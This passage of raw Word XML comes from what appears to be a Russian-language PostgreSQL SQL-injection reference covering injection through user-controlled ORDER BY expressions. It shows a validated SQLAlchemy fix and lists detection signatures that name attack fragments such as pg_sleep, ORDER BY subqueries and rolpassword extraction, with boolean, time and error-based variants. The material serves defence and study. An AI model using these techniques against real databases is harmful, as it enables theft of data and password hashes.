    <w:p w14:paraId="1EF50534" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        except ValueError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D55835" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA5CB8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if direction not in ("asc", "desc"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F12C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7000306F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        col_obj = getattr(Order, col_enum.value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F11DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        columns.append(col_obj.asc() if direction == "asc" else col_obj.desc())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CB807" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCCA98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        columns = [Order.created_at.desc()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10551232" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7CE13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    stmt = select(Order).where(Order.created_at &gt; func.now() - text("interval '90 days'")) \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02997471" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        .order_by(*columns).limit(200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414B5BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(stmt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D17B0"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result.scalars().all()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2875D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Каждая column валидируется через Enum, direction — через literal. Финальный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>order_by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> собирается из ORM-объектов, не из строк — никакого SQL-text от пользователя в ORDER BY не попадает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9FDF1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3F3DC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (expression в ORDER BY — SQL92+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48316710" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любая роль с EXECUTE-доступом к эндпоинту + SELECT на target-tables для extraction (для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4BA901" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любой — все три варианта работают через single-statement query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F5D30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user-controlled sort expression передаётся через f-string в SQL без decompose+validate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6BB68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Полная sort-expression в ORDER BY — стандартный паттерн в admin-UI и reporting tools, где пользователь хочет multi-column sort с направлениями. Корректный pattern — сервер собирает expression из validated tokens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A102466" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Пример валидного запроса от UI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58514FEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># GET /reports/orders?sort=amount:desc&amp;sort=created_at:asc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273D5BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># → ORDER BY orders.amount DESC, orders.created_at ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DBBF06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>ORM-side composition гарантирует, что в SQL попадают только known column-objects. Альтернатива — построение string-spec через jinja-template с whitelist filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393C43B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JINJA_ENV = Environment(...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD902D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JINJA_ENV.filters['order_clause'] = build_order_clause_from_dict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3590F500" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513D4FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># В template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF05DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY {{ sort_spec | order_clause }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF0D735" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D09FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: f-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY {var}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>var: str</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — особенно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_expr</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>order_spec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> именами параметров.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF4DA98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (... pg_sleep ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от endpoint без admin/reporting role. В normal-traffic такие expressions не встречаются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72CF16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`log_min_duration_statement`</w:t>
      </w:r>
      <w:r>
        <w:t>: ORDER BY с pg_sleep — длительность × кол-во rows, легко обнаружить аномалии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F5EFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: invalid input syntax for type integer/uuid/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от ORDER BY-subquery — индикатор Variant C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B6A72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: query parameter содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — критичные signal-words.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF7826" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:t>; expression в ORDER BY — SQL92+. Никакие фиксы не закрывают этот класс — application-level mis-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E111063" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE83D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant A — стандартный boolean-channel через ORDER BY. Граница: 3.3 описывает канал в общем; 3.14.4 — конкретная точка входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65050C86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B — time-channel в ORDER BY-sort phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE51B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant C — error-канал через ORDER BY-subquery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59519592" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.1 LIMIT/OFFSET integer-context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — тот же класс subquery-in-clause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E3F5CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant C из 3.14.3 эскалирует в 3.14.4 при escape-режиме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2959ABAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — decompose-validate-rebuild шаблон для multi-column sort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B6BB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FFB526" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SELECT» / «ORDER BY Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-ORDERBY</w:t>
      </w:r>
    </w:p>
